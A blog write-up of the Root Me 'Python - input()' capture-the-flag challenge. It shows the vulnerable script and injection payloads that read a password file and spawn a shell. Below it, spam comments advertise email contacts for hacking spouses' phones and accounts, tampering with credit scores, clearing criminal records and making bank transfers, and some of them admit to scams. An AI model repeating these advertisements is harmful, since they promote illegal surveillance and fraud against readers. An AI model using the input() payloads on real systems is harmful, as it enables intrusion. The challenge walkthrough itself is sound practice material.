A good choice to start learning is
Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.
Let's start with the first category: App - Script.
The sixth challenge that we face is: Python - input():
Vulnerability type:
- Vulnerability Exploitation by Input() Python function
##################################################
At the beginning, open terminal and type:
- ssh -p 2222 app-script-ch6@challenge02.root-me.org
to connect to the target system. If it asks for a password, insert app-script-ch6.
If we type ls -la command, we will see four files: ch6.py, setuid-wrapper, .passwd and setuid-wrapper.c.
setuid-wrapper simply calls the ch6.py script.
setuid-wrapper simply calls the ch6.py script.
For first, let's analyze the ch6.py script file:
#!/usr/bin/python2
import sys
def youLose():
print "Try again ;-)"
sys.exit(1)
try:
p = input("Please enter password : ")
except:
youLose()
with open(".passwd") as f:
passwd = f.readline().strip()
try:
if (p == int(passwd)):
print "Well done ! You can validate with this password !"
except:
youLose()If passwd has been defined before the input() statement, I could set as input int(passwd) and in this way, the if statement would be always true.
In our case, we need to read the .passwd. To do this, start the program by setuid-wrapper, then we can exploit the vulnerability by inserting __import__("os").system('cat .passwd'). We will get the solution.
Remember that I can also call a bash shell by inserting __import__("os").execl("/bin/sh","sh"). In this way we have a shell with app-script-ch6cracked privileges.
RispondiEliminaBeware of scammers i have been scammed 3 times because i was trying to know if my husband was cheating until i met this hacker named; (wizardcyprushacker@gmail.com) who helped me hack into my spouse phone for real this great hacker hacked into my spouse whats-app messages,Facebook messages.text messages,call logs,deleted text messages,bitcoin account and many more i was impressed with his job and he brought me results under 24 hours believe me he is real and his services are cheap and affordable.
Gaining access into my wife’s device was not that easy, as my expertise wasn’t that much not until I told AFONKAPETROV@TUTANOTA.COM about this. He helped in cracking the AES (Advanced Encryption Standard) and EXPLOITING all VULNERABILITIES in the device hereby providing a thorough access to the mobile’s data. After all, it was not a waste of effort. There was SEVERE INFIDELITY on her part. Now, I guess I need the divorce immediately and child custody too.
RispondiEliminaIf you really need a professional hacker to hack your cheating boyfriend's/girlfriend's/spouse phone, whatsapp, facebook, bank account hack etc. Or credit score upgrade, I would recommend
RispondiEliminaETHICALHACKERS009@GMAIL.COM
He has proven to be trustworthy, His jobs are fast and affordable. He has carried out over 3 jobs for me including helping me hack my ex wife's mobile phone and i can't forget when he cleared my credit card debts and improved my credit score to 750. I can put my money on him at anytime!. He's one of the best out there. Spreading the word as my little favor to him for all he's done. Thank me later.
hi, when you have lost a lot of money trying to get the best hacker to work with? it gets tiring but at the end of the day, you get what you want as i have when i finally worked with wrathgod007@gmail.com. if you need to confirm if your spouse is cheating, contact him, if you need to gain access into any email or social media account, contact him, if you need your grades, credit score up, contact him, if you need to access any website or database or clear criminal records, contact him. He did a marvelous job with my credit score from 437-766 and cleared my duis
RispondiEliminaThey are all scammers, they will make you pay after which they will give you an excuse asking you to pay more money, they have ripped me of $2000, i promised i was going to expose them.
RispondiEliminaI figured it all out when my colleague took me to Pavel
(HACKINTECHNOLOGY@GMAIL.COM)
CELL PHONE +16692252253
He did perfect job, he hacks all accounts ranging from (Emails, Facebook, whatsapp, imo, skype, instagram, Phone cloning, DMV removal, tracking locations, background checks Kik etc. he also hacks cell phones, cell phone tapping and cloning, clears bad driving and criminal records, bank transfers, locates missing individuals e.t.c. You should contact him and please stop using contacts you see on websites to execute jobs for you, you can ask around to find a real hacker.